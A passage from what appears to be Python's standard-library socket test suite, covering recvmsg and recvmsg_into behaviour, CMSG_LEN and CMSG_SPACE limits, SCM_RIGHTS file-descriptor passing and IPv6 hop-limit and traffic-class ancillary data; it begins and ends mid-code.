self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
